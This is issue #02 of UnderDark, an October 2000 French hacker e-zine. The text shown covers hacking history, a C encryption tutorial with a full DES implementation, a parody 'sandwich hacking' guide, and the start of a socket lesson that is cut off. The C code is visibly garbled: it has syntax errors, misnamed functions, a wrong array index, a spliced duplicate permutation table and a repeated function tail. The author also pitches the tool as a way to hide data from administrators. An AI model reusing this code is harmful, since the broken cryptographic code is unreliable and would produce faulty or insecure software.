 

     * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ *
     @   ____    ____                              ___________                          @
     @  |UUUU|  |UUUU|__   __ ____  _____ ______  |DDDDDDDDDDD\  _____ ______   _   __  @
     @  |U  U|  |U  U|  \ |  |  _ \|  ___|  __  | |D   ___    D\/  _  \  __  | | | / /  @
     @  |U  U|  |U  U|   \|  | | | \ |___| |  | | |D  |DDD\    D| |_| | |__| | | |/ /   @    
     @  |U  U|  |U  U|       | | | |  ___|  ¯¯  | |D  |D  D|   D|  _  |      | |   |    @
     @  |U  U|  |U  U|       | |_| / |___|  |\  \ |D  |D  D|   D| | | |  |\  \ | |\ \   @
     @  |U  U|__|U  U|___|\__|____/|_____|__| \__\|D  |D  D|   D|_| |_|__| \__\|_| \_\  @
     @  |U  UUUUUU  U|                            |D  |DDD/    D|                       @
     @  |U          U|                            |D   ¯¯¯    D/                        @
     @  \UUUUUUUUUUUU/                            |DDDDDDDDDDD/                         @
     @   ¯¯¯¯¯¯¯¯¯¯¯¯                              ¯¯¯¯¯¯¯¯¯¯¯                          @
     @			"Felix qui potuit rerum cognoscere causas"			    @
     @						a.k.a							    @
     @		          "Blanche-Neige et les 7 g-strings"			          @
     * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ *
     @     	UnderDark		@   Http://www.UnderDark.cc	@ 	   #UnderDark	    @
     @	   #02		@					@     us.undernet.org	    @
     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



                     ________________________________________________________________________                   
  ______________    /   UnderDark Menu :                    Auteur:                     	   \
 /  UnderDark   \  |¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|
|   Numéro 02    | |     [01]	Histoire du hacking		Mind Flayer		      	    |					  	
 \ Octobre 2000 /  |     [02]	Initiation au cryptage		R4ZOR	 	      	   	    |
  ¯¯¯¯¯¯¯¯¯¯¯¯¯¯   |     [03]	Hack de sandwitch au jambon   Mind Flayer / Kitetoa      	    |
                   |     [04]	Lecon sur les sockets         R4ZOR			      	    |
                   |     [05]	Oh My God! This is default    Mind Flayer			     	    |
                   |     [06]	Web Hack				[ALIENS]				    |
                   |     [07]	Internet Outdial			Mind Flayer				    |
                   |     [08]	Powered by Budweiser		Mind Flayer				    |
                   |     [09]	Social Enginnering		[ALIENS]				    |
 			 |	 [10]	Base sur le C			Kool_Shen				    |
			 |	 [11]	Rentrer Dans Un Systeme		DePotEdon				    |
			 |	 [12] Talentsoft WebPlus 		Mind Flayer				    |
			 |	 [13] Crack WinRar 2.50			Sulfur'X				    |
	             |												    |
			 |__________________________________________________________________________|	
			  \________________________________________________________________________/



	@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
	@@											     @@
	@				Merci à nos distributeurs				@
	@												@
	@		Madchat		http://www.madchat.org				@
	@		Not Phor Kops	http://npk.fr.st/					@
	@		SpyderMag		http://www.spydermag.net/			@
	@												@
	@@											     @@
	@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

 Intro Par Mind Flayer
 =====================

Bon, nous voila déja rendu au numero deux, ca passe vite quand meme. Serieusement, j'crois
que UnderDark a de plus en plus ca raison d'etre depuis le coma profond de Pyrofreak, c'est 
surment pas voulu de leur part mais j'croit qui nous donne un bon coup de pouce en nous 
laissant le champ libre, a nous de prouver se qu'on vaux. À part ca on peux dire que la scene
au Quebec est dans un état végétatif profond, a part IGA qui donne quelque signe de vie de 
temps à l'autre, la majorité de la scene québecoise est dans un coma profond.
Il y as toujours du monde sur #pyrofreak, et on commence a croire a un regain de vie,
esperons que ca ne seras pas un coup d'épée dans l'eau. Cepandant nous attendons toujours pour
le numéro 11 j'crois qui va falloir attendre longtemps si ce n'est pas toujours... 
Bon alors nous on va essayer de faire un #2 qui kick ass, si vous avez pas aimer le premier 
laisser nous une autre chance, si vous l'avez aimer vous devriez adorer ce numéro. Aussi 
j'tiens a mettre une petite annonce question de pas me repeter 1000 fois. On a recu beaucoup 
de demande genre "Comment je fais si je veux faire partie d'UnderDark?" Alors je vais marquer 
la reponse ici c'est en fait tout simple. Il suffit de venir sur notre canal irc participer au 
discution, amener des idées pour la team ou encore écrire des articles dans le zine. Si on 
aime votre facon de penser et vos competences, un membre de UnderDark ira peux-etre vous 
offrir de vous joindre a nous. Sinon perseverer et peut-etre un jour quelqu'un viendra vous 
l'offrir. Bon, aussi pourquoi pas une petite pub pour le nouveau site d'IGA [www.planetiga.net]
qui est vraiment superbe, seul petit hic c'est qu'il est souvent down... P-t un changement
d'hébergeur ne ferait pas de mal. Bon tant qu'a écrire, je tiens a faire une
petite pub pour Skreel, [www.skreel.org], un service d'hebergement gratuit et anonyme, un peu
dans le genre du defunt altern.org, mais offrant 35 megs d'espace-disque, ayant une 
communauté asser vivante et de plus tolere les site underground. Donc casser vous pas la tete
et encourager Skreel ou autre projet du genre....

 

	*************************************************************************
	* 				Random Quote Player					*			
      *<FILA667> chui pas lame     								*
	*    												*
      *												*
      *************************************************************************

      :   :                                     .--------.
    :  :   :                    %%%%%%%        ( ph33r me )-.
         :                 %%%%%%%%%%%%%%%     o`-(i'am l33t )
     :               ____%%%%%%%%%%%%%%%%%%%  O  (dont fuck )
        :         .'"    `.%%%...%%%%%%%%%%%%o__  `-(with me )
      :          /        .:"     `-.%%%%%%,-' _`.   `-------'
         :      |HH      /  dHb      `.%%,' .-' .\\
       :        `.P     ;   HHH        :/ ,' . . .\:
     :            `-.__.|   "HP        : /:::.. . ::
      :          .----' `.            ,'/#:::. .  //
    :          .'         `-._    _.-' /###::.. .//
     ( :      :        /      """"     :##:::. .//
      )       /`.___,-'                `.:::. .//
     ((      /                   /       `-._,-'
      )      \__               .'  )          \  <---FILA667
    ,++---------`.________..--'   /            \     
    `++----------/  /  /  /      /\             \
                 \_/\_/|_/    ,-'  \             \
                   `-.___,-'""      \/            \
                      `'`           (__            `--._
                                      \                 `-.
                                      /                    \

 Disclaimer
 ==========
 
Bon voila la partie chiante du zine, fack j'va essayer de faire ca bref. Nous considerons que
ce zine est legal donc si vous n'etes pas d'accord, veiller clicker dans le tit X en haut a
droite. Aussi, ce zine est interdit au l33t qui save tout et qui critique tout le monde juste
parce qui on rien d'autre a faire. On dit pas qu'on est parfait alors venez nous dire
ce que vous penser du zine sur #underdark. Aussi, le groupe en entier ne peux etre retenu 
responsable de quoi que se soit, alors si un de nous fait quelque chose d'illegal, les autre 
ne peuvent etre tenu responsable de ses actes. Aussi nous encourageaons personne a hacker, 
nous essayons seulement d'aider les admin a securiser leur reseaux (si si , si c'est écrit 
c'est que c'est vrai bon). Bon c pas mal tout si vous etes tanner de lire un disclamer bin 
y fini la.

	*************************************************************************
	* 			Random Quote Player						*			
	*<[G4ndalf]> c est koi i va avoir au camping fest??				*
	*<__2> on va boire du grog								*
	*<__2> et allez incendiez 2 ou 3 villages   					*
      *												*
      *************************************************************************


    ___________________________________________________
   / 						       		 \		
  | [01]-- Histoire du hacking				  |
  | 	   			Par Mind Flayer		        |
  |        Sujet: Histoire		            	  |
  |							              | 
   \___________________________________________________/


Cette article ne pretends par décrire l'histoire complete du piratage informatique mais n'en
offrir qu'un court resumé. Comme mon prof d'histoire me disait: " Il faut savoir d'où qu'on
vient pour savoir où qu'on s'en va". Bon je commence ca tout de suite question de pas écrire 
pour rien.


Le début 1960-1970
==================

C'est au début des années 60 qu'apparaissent les premiers pirates en informatiques. A cette 
époque, de jeunes génies en programmation d'ordinateurs sont engagés par le célèbre MIT 
(Massachusetts Institute of Technology) dans ses laboratoires de recherche sur l'IA 
(intelligence artificielle). Ils sont plus précisement affectés au proket connu sous le nom de
"MAC", sigle recouvrant au choix Machine-Aided Cognition, Multiple-Access Computers ou encore
Man Against Computers.

Il peut paraitre étrange que le MIT, avec la benediction du département de la défense américain,
ait engagé ce groupe bizarre et marginal de jeunes fanatiques. Les autorités concernés avaient
néanmoins compris que seuls ces adolescents négligés, vivant à rebours et parlant un language 
uniquement compréhensible par d'autres pirates, étaient à même de créer les logiciels les plus
modernes du monde. Elles ne furent pas décues. Ce sont eux en effet qui mirent au point les 
premiers programmes de jeux d'échecs, et qui participerent, avec un chercheur nommer John 
McCarthy, à l'élaboration d'un language de haut niveau, le LISP, destiné aux programmeurs
d'intelligence artificielle.

Ils furent aussi les premiers à assembler les programmes sophistiqués connus sous le nom de 
systeme-expert. Cepandant, leurs plus grande invention est certainement celle du temps partagé.
Ce fut un des plus grand progres en informatique. Jusque-là, les programmeurs n'avaient aucun
moyen direct d'intervenir sur l'ordinateur. Ils devait remettre leurs piles de cartes perforées
aux opérateurs, grand pretres du monde des unités centrales, et attendre les résultats.
Ceux-ci, bons ou mauvais, revenaient sous forme de papier imprimé, et pour une seule correction
la pile entière devait repasser. Il semblait que les unités centrales et les consoles s'étaient
donnés le mot pour maintenir les programmeurs a distance.

Si un rapprochement eut lieu entre l'homme et la machine, c'est donc grace à ces personnes que
nous le devons. L'invention de programmes supprimant une opération intermediaire fastidieuse
et permettant d'afficher immediatement les resultats sur un ecran à tube cathodique fut une 
découverte de grande importance. On peux donc facilement comprendre l'influence que les 
premiers hackers eurent sur le monde de l'informatique.

Outre la découverte du temps partagés, ces adolescents prodiges développèrent de meme des 
programmes spécifiques destinés a paralyser un systeme en rejetant aux oubliettes de 
l'ordinateur toute les donnés non-protégéeé Puisque ce genre de programme profitait de toute 
faiblesse ou vulnérabilité d'un systeme pour les bloquer, le projet MAC en usa abondamment. 
En utilisant autant les qualités de programmation que l'ingéniosité en piratage de ses jeunes 
recrues, le MIT put ainsi renforcer sans cesse la sécurité de ses ordinateurs.

Suite dans un prochain numéro.... 


	*************************************************************************
	* 			Random Quote Player						*			
	*<g463_> g463 c'est le meilleur							*
      *												*
      *************************************************************************

    ___________________________________________________
   / 						       		 \		
  | [02]-- Initiation au cryptage				  |
  | 	   			Par R4ZOR			        |
  |        Sujet: Coding               		        |
  |							              | 
   \___________________________________________________/



LANGAGE C (nunux))

 PART I

 dans cette article je ne vais pas vous montrer comment trouver l'algorithme
 de cryptage d un code,cet article est seulement destiner a vous eveiller
 un peu dans cette fabuleuse aventure qui est le cryptage de données.
 moa perso c la premiere fois que j ecris un article alors vous attendez a pas
 a qqchose de hot ! pi moi chui encore un debutant... 
 neanmoins nous apprendrons a faire un pouti crypteur et décrypteur.


 il faut savoir d abord que il y a x facon de crypter des donneés...

 distinguons dabord 2 methodes de cryptage : le cryptage utilisant MD5 et
 le cryptage utilisant DES.le cryptage utilisant la methode MD5 est preferable
 a celui utilisant DES car il s agit d une fonction a sens unique,
 ne permettant an aucun cas de retrouver le mot de passe original a partir de la version
 crypt‚.(consulter la RFC 1321 pour plus de detail ,vous y trouvez l algorithmes
 de cryptage MD5 ainsi que de bon exemple de code d'implementation)
 j ai rajouté pour vous ds cet article l'algo DES un peu plus bas. chui gentil hein ...

 je sais le mot *crypt* apparait beaucoup dans cet article mais ca veut pas dire que je
 fais de l alzeimer :}

 Bah on commence dabord tout slowly 
 vous devez savoir qui il existe une fonction de cryptage tres simple disponible
 ds la bibliotheque C eh vi c la fameuse fonction crypt() ( <crypt.h>)

 <crypt.h> :
 char * crypt (const char *mot_passe,const char *prefixe;)

 exemple_1.c
 ------------------------------------------------------------------------------
 #include <stdio.h>
 #include <unistd.h>
 #include <crypt.h>
 int main ( int argc, char *argv [])
 {
 if (argc!=3) {
 fprintf (stderr, "syntaxe : %s mot_passe prefixe \n"? argv[0];
 exit (1);
 }
 fprintf (stdout,"%s\n", crypt (argv [1], argv [2];
 exit (0);
 }


 ./exemple_1 UNDERDARK \$1\$abccdefgh\$ (cryptage MD5)



 ./exemple_1 UNDERDARK ab (cryptage DES)



 exemple_2.c now notre exemple_2 va verifie que notre mot de passe
 obtenu en haut est correcte

 exemple_2.c
 ------------------------------------------------------------------------------
 #include <stdio.h>
 #include <unistd.h>
 #include <crypt.h>

 int main ( int argc, char *argv [])
 {

 char *cryptage;

 if (argc!=3) {
 fprintf (stderr, "syntaxe : %s mot_passe XXXXXXXX \n"? argv[0];
 exit (1);
 }

 cryptage=crypt (argv [1], argv [2]);
 if (strcasecmp (cryptage,argv [2])==0)
 fprintf ( stdout,"mot de passe correct !\n");

 else
 fprintf (stdout,mot de passe incorrect !\n";
 exit (0);

 }


 ./exemple_2 UNDERDARK \$1\$ICI_MOT_PASSE_OBTENU_EN_HAUT 
 mot de passe correct !




 ici nous avons donc crypter de simple mot de passe mais il faut savoit que la
 fonction crypt() n'est pas pratique a utiliser pour crypter des données car
 car cette fonction n'est pas reversible donc on peut pas recuperer les données
 de depart.


 DES fonctionne en cryptant des blocs de données de 64 bits en utilisant
 une clé de 54 bits.

 okey dokey,bah now on va faire un exemple de crypter/descrypter que je vous ai promis :)

 ici nous utiliserons la fonction ecb_encrypt() declare‚ ds <rpc/des_crypt.h>:
 int ecb_crypt (char *cle,char*bloc,unsigned longueur,unsigned mode)

 la clé est passer en premier argumant avec un bloc de 8 octets et la fonction
 des_setparity() assurera que que les bits de parités sont correctement positionnées

 ainsi que les constantes:

 DES_ENCRYPT et DES_DECRYPT
 -----------------------------------------------------------------------------------
 -----------------------------------------------------------------------------------
 on decidera en ligne de commande en arg[0] si on veut que notre tit prog
 joue le role de crypter ou decrypter.

 exemple_ecb_crypter.c

 #define _GNU_SOURCE
 #include <fcntl.h>
 #include <stdio.h>
 #include <string.h>
 #include <unistd.h>
 #include <sys/mman.h>
 #include <sys/stat.h>
 #include <rpc/des_crypt.h>

 int main (int argc, char *argv[])
 {
 int retour;
 unsigned mode;
 char cle [8];
 char *projection;
 long taille_fichier;
 struct stat etat_fichier;
 int fichier;
 char *nom_programme;


 if (arg!=3){
 fprintf (stderr,"syntaxe %s: fichier cle\n",argv [0]);
 exit (1); 
 }
 //CHOIX DU MODE 
 mon_programme=basename (argv [0];
 if (strcasecmp (nom_programme,"des_decrypte")=0)

 mode=DES_DECRYPT;

 else
 mode=DES_ENCRYPT;

 if ((fichier=open (argv [1],O_RDWR)) < 0 ) {

 perror("open");
 exit (1);
 }

 if (stat (argv [1],& etat_fichier) !=0) {
 perror ("stat");
 exit (1);
 }
 taille_fichier=etat_fichier.st_size;
 taille_fichier=((taille_fichier+7 >>3) <<3; 
 projection=(char*)nmap (NULL,taille_fichier, //PROJECTION DU FICHIER EN MEMOIRE

 PROT_READ| PROT_WRITE,MAP_SHARED,fichier,0);

 if (projection==(char*)MAP_FAILED {
 perror ("nmap")
 exit (1);

 }

 close (fichier);
 strncpy(cle,argv[2],10); //ON COMPLETE LA CLE AVEC DES 0 SI LA CLE A MOINS DE 8 CARACTERES
 (char* cle [8]) 
 des_setparity(cle);
 retour=ecb_crypt (cle,projection,taille_fichier,mode); // ICI SE DEROULE LE CODAGE

 if (DES_FAILED (retour)) {
 perror("ecb_crypt");
 exit (1);

 }

 munmap (projection,taille_fichier);

 return (0);

 }

 ------------------------------------------------------------------------------
 ------------------------------------------------------------------------------
 la c plus hard...
 University of Iowa, Iowa City, IA, USA poster par Mattew fisher .


 /* DES.C */


 #include <stdio.h>

 static int keyout[17][48];

 void des_init(),lshift(),cypher(),des_encrypt(),des_descrypt();

 void des_init(unsigned char *key){
 unsigned char c[28],d[28];
 static int pc1[56] = {57,49,41,33,25,17,9,
 01,58,50,42,34,26,18,
 10,02,59,51,43,35,27,
 19,11,03,60,52,44,36,
 63,55,47,39,31,23,15,
 07,62,54,46,38,30,22,
 14,06,61,53,45,37,29,
 21,13,05,28,20,12,04};
 static int pc2[48] = {14,17,11,24,1,5,
 3,28,15,6,21,10,
 23,19,12,4,26,8,
 16,7,27,20,13,2,
 41,52,31,37,47,55,
 30,40,51,45,33,48,
 44,49,39,56,34,53,
 46,42,50,36,29,32};
 static int nls[17] = {
 0,1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1};

 static int cd[56],keyb[64];
 static int cnt,n=0;
 register int i,j;

 for(i=0;i<8;i++) /*Read in key*/
 for(j=0;j<8;j++) keyb[n++]=(key[i]>>j&0x01);

 for(i=0;i<56;i++) /*Permuted choice 1*/
 cd[i]=keyb[pc1[1]-1];
 for(i=0;i<28;i++){
 c[i]=cd[i];
 d[i]=cd[i+28];
 }
 for(cnt=1;cnt<=16;cnt++){
 for(i=0;i<nls[cnt];i++){
 lshift(c); lshift(d);
 }
 for(i=0;i<28;i++){
 cd[i]=c[i];
 cd[i+28]=d[i];
 }
 for(i=0;i<48;i++) /*Permuted Choice 2*/
 keyout[cnt][i]=cd[pc2[i]-1];
 }
 }

 static void lshift(unsigned char shft[]){
 register int temp,i;

 temp=shft[0];
 for(i=0;i<27;i++) shft[i]=shft[i+1];
 shft[27]=temp;
 }

 static void cypher(int *r, int cnt, int *fout){
 static int expand[48],b[8][6],sout[8],pin[48];
 register int i,j;
 static int n,row,col,scnt;
 static int p[32]={
 16,7,20,21,29,12,28,17,1,15,23,26,
 5,18,31,10,2,8,24,14,32,27,3,9,
 19,13,30,6,22,11,4,25};

 static int e[48] = {32,1,2,3,4,5,
 4,5,6,7,8,9,
 8,9,10,11,12,13,
 12,13,14,15,16,17,
 16,17,18,19,20,21,
 20,21,22,23,24,25,
 24,25,26,27,28,29,
 28,29,30,31,32,1};

 static char s[8][64] = {
 14,4,13,1,2,15,11,8,3,10,6,12,5,9,0,7, /*s1*/
 0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8,
 4,1,14,8,13,6,2,11,15,12,9,7,3,10,5,0,
 15,12,8,2,4,9,1,7,5,11,3,14,10,0,6,13,
 15,1,8,14,6,11,3,4,9,7,2,13,12,0,5,10, /*s2*/
 3,13,4,7,15,2,8,14,12,0,1,10,6,9,11,5,
 0,14,7,11,10,4,13,1,5,8,12,6,9,3,2,15,
 13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9,
 10,0,9,14,6,3,15,5,1,13,12,7,11,4,2,8, /*s3*/
 13,7,0,9,3,4,6,10,2,8,5,14,12,11,15,1,
 13,6,4,9,8,15,3,0,11,1,2,12,5,10,14,7,
 1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12,
 7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15,/*s4*/
 13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9,
 10,6,9,0,12,11,7,13,15,1,3,14,5,2,8,4,
 3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14,
 2,12,4,1,7,10,11,6,8,5,3,15,13,0,14,9,/*s5*/
 14,11,2,12,4,7,13,1,5,0,15,10,3,9,8,6,
 4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14,
 11,8,12,7,1,14,2,13,6,15,0,9,10,4,5,3,
 12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11, /*s6*/
 10,15,4,2,7,12,9,5,6,1,13,14,0,11,3,8,
 9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6,
 4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13,
 4,11,2,14,15,0,8,13,3,12,9,7,5,10,6,1,/*s7*/
 13,0,11,7,4,9,1,10,14,3,5,12,2,15,8,6,
 1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2,
 6,11,13,8,1,4,10,7,9,5,0,15,14,2,3,12,
 13,2,8,4,6,15,11,1,10,9,3,14,5,0,12,7, /*s8*/
 1,15,13,8,10,3,7,4,12,5,6,11,0,14,9,2,
 7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8,
 2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11
 };

 for(i=0;i<48;i++) expand[i]=r[e[i]-1]; /*Expansion Function*/
 for(i=n=0;i<8;i++) {
 for(j=0;j<6;j++,n++) b[i][j]=expand[n]^keyout[cnt][n];
 }

 /*Selection functions*/

 for(scnt=n=0;scnt<8;scnt++){
 row=(b[scnt][0]<<1)+b[scnt][5];
 col=(b[scnt][1]<<3)+(b[scnt][2]<<2)+(b[scnt][3]<<1)+b[scnt][4];
 sout[scnt]=s[scnt][(row<<4)+col];
 for(i=3;i>=0;i--){
 pin[n]=sout[scnt]>>i;
 sout[scnt]=sout[scnt]-(pin[n++]<<i);
 }
 }
 for(i=0;i<32;i++) fout[i]=pin[p[i]-1]; /*Permutation Function*/
 }

 static int p[64] = {58,50,42,34,26,18,10,2,
 60,52,44,36,28,20,12,4,
 62,54,46,38,30,22,14,6,
 64,56,48,40,32,24,16,8,
 5 = {58,50,42,34,26,18,10,2,
 60,52,44,36,28,20,12,4,
 62,54,46,38,30,22,14,6,
 64,56,48,40,32,24,16,8,
 57,49,41,33,25,17,9,1,
 59,51,43,35,27,19,11,3,
 61,53,45,37,29,21,13,5,
 63,55,47,39,31,23,15,7};

 static int invp[64]={
 40, 8,48,16,56,24,64,32,39, 7,47,15,55,23,63,31,
 38, 6,46,14,54,22,62,30,37, 5,45,13,53,21,61,29,
 36, 4,44,12,52,20,60,28,35, 3,43,11,51,19,59,27,
 34, 2,42,10,50,18,58,26,33, 1,41, 9,49,17,57,25};

 void des_encrypt(unsigned char *input){
 static unsigned char out[64];
 static int inputb[64],lr[64],l[32],r[32];
 static int fn[32];
 static int cnt,n;
 register int i,j;

 for(i=n=0;i<8;i++)
 for(j=0;j<8;j++) inputb[n++]=(input[i]>>j&0x01);

 for(i=0;i<64;i++){ /*Initial Permutation*/
 lr[i]=inputb[p[i]-1];
 if(i<32) l[i]=lr[i];
 else r[i-32]=lr[i];
 }
 for(cnt=1;cnt<=16;cnt++){ /*Main encryption loop*/
 cypher(r,cnt,fn);
 for(i=0;i<32;i++){
 j=r[i];
 r[i]=l[i]^fn[i];
 l[i]=j;
 }
 }
 for(i=0;i<32;i++){
 lr[i]=r[i];
 lr[i+32]=l[i];
 }
 for(i=0;i<64;i++) out[i]=lr[invp[i]-1]; /*Inverse IP*/

 for(i=1;i<=8;i++)
 for(j=1;j<=8;j++) input[i-1]=(input[i-1]<<1)|out[i*8-j];
 }

 void des_decrypt(unsigned char *input){
 static unsigned char out[64];
 static int inputb[64],lr[64],l[32],r[32];
 static int fn[32];
 static int cnt,rtemp,n;
 register int i,j;

 for(i=n=0;i<8;i++)
 for(j=0;j<8;j++) inputb[n++]=(input[i]>>j&0x01);

 for(i=0;i<64;i++){ /*Initial Permutation*/
 lr[i]=inputb[p[i]-1];
 if(i<32) l[i]=lr[i];
 else r[i-32]=lr[i];
 }
 for(cnt=16;cnt>0;cnt--){ /*Main decryption loop*/
 cypher(r,cnt,fn);
 for(i=0;i<32;i++){
 rtemp=r[i];
 if(l[i]==1 && fn[i]==1) r[i]=0;
 else r[i]=(l[i] || fn[i]);
 l[i]=rtemp;
 }
 }
 for(i=0;i<32;i++){
 lr[i]=r[i];
 lr[i+32]=l[i];
 }
 for(i=0;i<64;i++) out[i]=lr[invp[i]-1]; /*Inverse IP*/

 for(i=1;i<=8;i++)
 for(j=1;j<=8;j++) input[i-1]=(input[i-1]<<1) | out[i*8-j];
 }

 int main(int argc, char *argv[]){
 unsigned char *key;
 unsigned char data[8];
 int n;
 FILE *in;
 FILE *out;

 if (argc!=4) {
 printf("\r\nUsage: des [e][d] <source file> <destination file>\r\n");
 return 1;
 }

 key=(unsigned char*)getpass("Enter Key:");
 des_init(key);

 if((in=fopen(argv[2],"rb"))==NULL){
 fprintf(stderr,"\r\nCould not open input file: %s",argv[2]);
 return 2;
 }

 if((out=fopen(argv[3],"wb"))==NULL){
 fprintf(stderr,"\r\nCould not open output file: %s",argv[3]);
 return 3;
 }

 if(argv[1][0]=='e'){
 while ((n=fread(data,1,8,in)) >0){
 des_encrypt(data);
 printf("data enctyted");
 if(fwrite(data,1,8,out) < 8){
 fprintf(stderr,"\r\nError writing to output file\r\n");
 return(3);
 }
 }
 }

 if(argv[1][0]=='d'){
 while ((n=fread(data,1,8,in)) >0){
 des_decrypt(data);
 if(fwrite(data,1,8,out) < 8){
 fprintf(stderr,"\r\nError writing to output file\r\n");
 return(3);
 }
 }
 }

 fclose(in); fclose(out);
 return 0;
 }ntf(stderr,"\r\nError writing to output file\r\n");
 return(3);
 }
 }
 }

 fclose(in); fclose(out);
 return 0;
 }






 ce code peut etre tres utile si vous voulez crypter des données afin que l'
 administrateur ne puisse pas les lire :=) .

 fin

 si vous avez des questions ou des rectifications n hesite pas a me mailer
 chui pas une machine =)

 by R4ZOR c20@voila.fr

	
	*************************************************************************
	* 			Random Quote Player						*			
	*<SerialZ> j'ai battu mon record !!!!!!!						*
	*<SerialZ> Win98 Uptime : 6hrs 4mins 52secs					*								
      *												*
      *************************************************************************

    ___________________________________________________
   / 						       		 \		
  | [03]-- Hacker votre sandwitch au jambon		  |
  | 	   			Par Mind Flayer/Kitetoa         |
  |        Sujet: Délire               		        |
  |							              | 
   \___________________________________________________/

Dans cet article,je vais vous decrire comment hacker un sandwitch au jambon:

	Premierement vous devez decouvrir sur quel OS le sandwitch fonctionne:
                 - Pain Blanc
                 - Pain Brun
                 - Pate a Pizza
                 - etc...

      Apres, vous avez a regarder sa grosseur. Il peux etre tres gros et vous aurez alors 
      besoin de beaucoup de CPU pour le hacker:
                 - un pied de long
                 - deux pied de long
                 - etc...

      Apres vous avez a regarder quelle sont les applications qui run sur le sandwitch:
                 - sauce
                 - beurre
                 - tomate
                 - jambon (bien sur mais vous avez a decouvrir quelle sorte de jambon, il peux
			 etre francais, espagnol, italien, americain etc...)
                 - etc...

      Maintenant que vous connaisser le type de sandwitch au jambon que vous aller hacker, il
	vous reste a trouver la methode que vous aller employer.
      Bien sur, vous pouvez exploiter des bugs connus.
      Exemples:

      - dans le jambon belge, il y a Dioxyne qui vous laisse formater le c: facilement avec une
	  simple commande. Quelque chose comme "load Dioxyne.exe, run dioxyne.exe, dioxyne va
	  formater le c:".
      - dans le jambon americain il y a souvent Hormone. Ce bug est connu pour mener vers un 
	  gros buffer overflow dans la partie "Tete" de l'admin.
      - dans le jambon francais, vous pouvez utiliser le bug tres connu "bad_english" et 
	  utiliser une commande speciale comme "ze french cancan iz a iz ze ultimate dance in 
	  ze worrrld". Ca devrait freezer le sandwitch au jambon. Un autre bug francais est celui
        du "Mad Ham" qui est un dérivé du "Mad cow" bug. Il conduit l'Admin a devenir stupide 
	  et a le forcer a donner son sandwitch sur demande
                
	Vous pouvez aussi utiliser une méthode comme:

      - hardcore penetration (brute force)
        ie: rooter le sandwich en essayant de trouver le mot de passe (utiliser un dictionnaire
        avec des mots utiles comme sauce, jambon, beurre, pain etc...). Bien sur, NT, Linux et
	  VMS sont des mots qui ne fonctionneront pas.
	
	Devinez pourquoi vous avez penser a ces mots :)  
    
      - smooth penetration
        ie: rooter le sandwitch au jambon en utilisant un simple buffer overflow dans la 
	  partition beurre (cette methode consiste a a entrer lentement votre doigt dans le
	  sandwitch)


      Une fois que vous avez rooter le sandwitch, envoyer une commande comme:

                 EAT

                 a la place de END

                 :)

                                     This Method/text file is Copywrong Kitetoa 1999 
						 Traduction par Mind Flayer
						 Liser l'original sur www.kitetoa.com


	*************************************************************************
	* 			Random Quote Player						*			
	*<Wyzeman> /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/()p 			*
	*<Wyzeman> ceci est mon pokemon chenille						*								
      *												*
      *************************************************************************

    ___________________________________________________
   / 						       		 \		
  | [04]-- Lecon sur les sockets				  |
  | 	   			Par R4ZOR		              |
  |        Sujet: Coding               			  |
  |							              | 
   \___________________________________________________/


 ( PART I )

 (nunux C)


 eh vi c encore moa decidement je dois tous vous inculquer au newbies que vous
 etes =).chui sur que vous revez de savoir comment fonctionne le monde des sockets
 et commant savoir en coder,bin la figurer vous que moa va t 'apprendre ca
 bah vous verez c pas tres sorcier si vous y mettez d y votre :-)
 cette article ne sera pas le seul sur les sockets car je vous promez que
 ds les futur zine de underdark je vous ferai a chaque fois une partie sur les sockets
 (sous C/java)
 donc ca deviendra progressivement hard ... 
 j accompagnerai cette article d exemple de sockets pour que vous puisser piger
 un peu tout ca .
 mais avant de vous lancer dans la programation sockets cela implique que vous
 ayez un minimun de connaissance en C et en protocole TCP/IP, mais j essaierai tres clair
 clair car cet article est kan meme reservé au newbies. 

 bon je vais d abord vous faire un tit rapelle elementaire 

 nous avons d un cote le SERVER et de l'autre le CLIENT

 le server est celui qui recoit la connexion
 alors que le client est celui qui demande la connexion
 bon juske ici spa un scoop...

 je pense qu'expliquer un code simple vous aidera bcp a comprendre les clients TCP.

 struct sockaddr_in adresse; 

 /*
 * sockaddr_in
 * 
 * struct sockaddr_in {
 * short sin_family;
 * u_short sin_port;
 * struct in_addr sin_addr;
 * char sin_zero[8];
 */ };


 le premier champs est la famille de comunication ,ici nous utiliserons la famille
 AF_INET (protocole ARPA ) bien sur il existe d autre famille de communication:

 -AF_INET : protocole fond‚ sur l ip ,regroupe les communication reseau avec
 IP,TCP,UDP/ICMP
 -AF_INET6: protocole IPng (experimental)
 -AF_IPX : protocole NOVELL (NOVELL is good!)
 -AF_AX25 : protocole pour les radioamateurs
 -AF_UNIX : communication limite‚ aux process residant sur la meme machine,ds certain cas
 elle peut etre remplace par AF_LOCAL (POSIX)


 ensuite le second champ est le numero de port (sin_port)

 le troisieme champ est une structure 


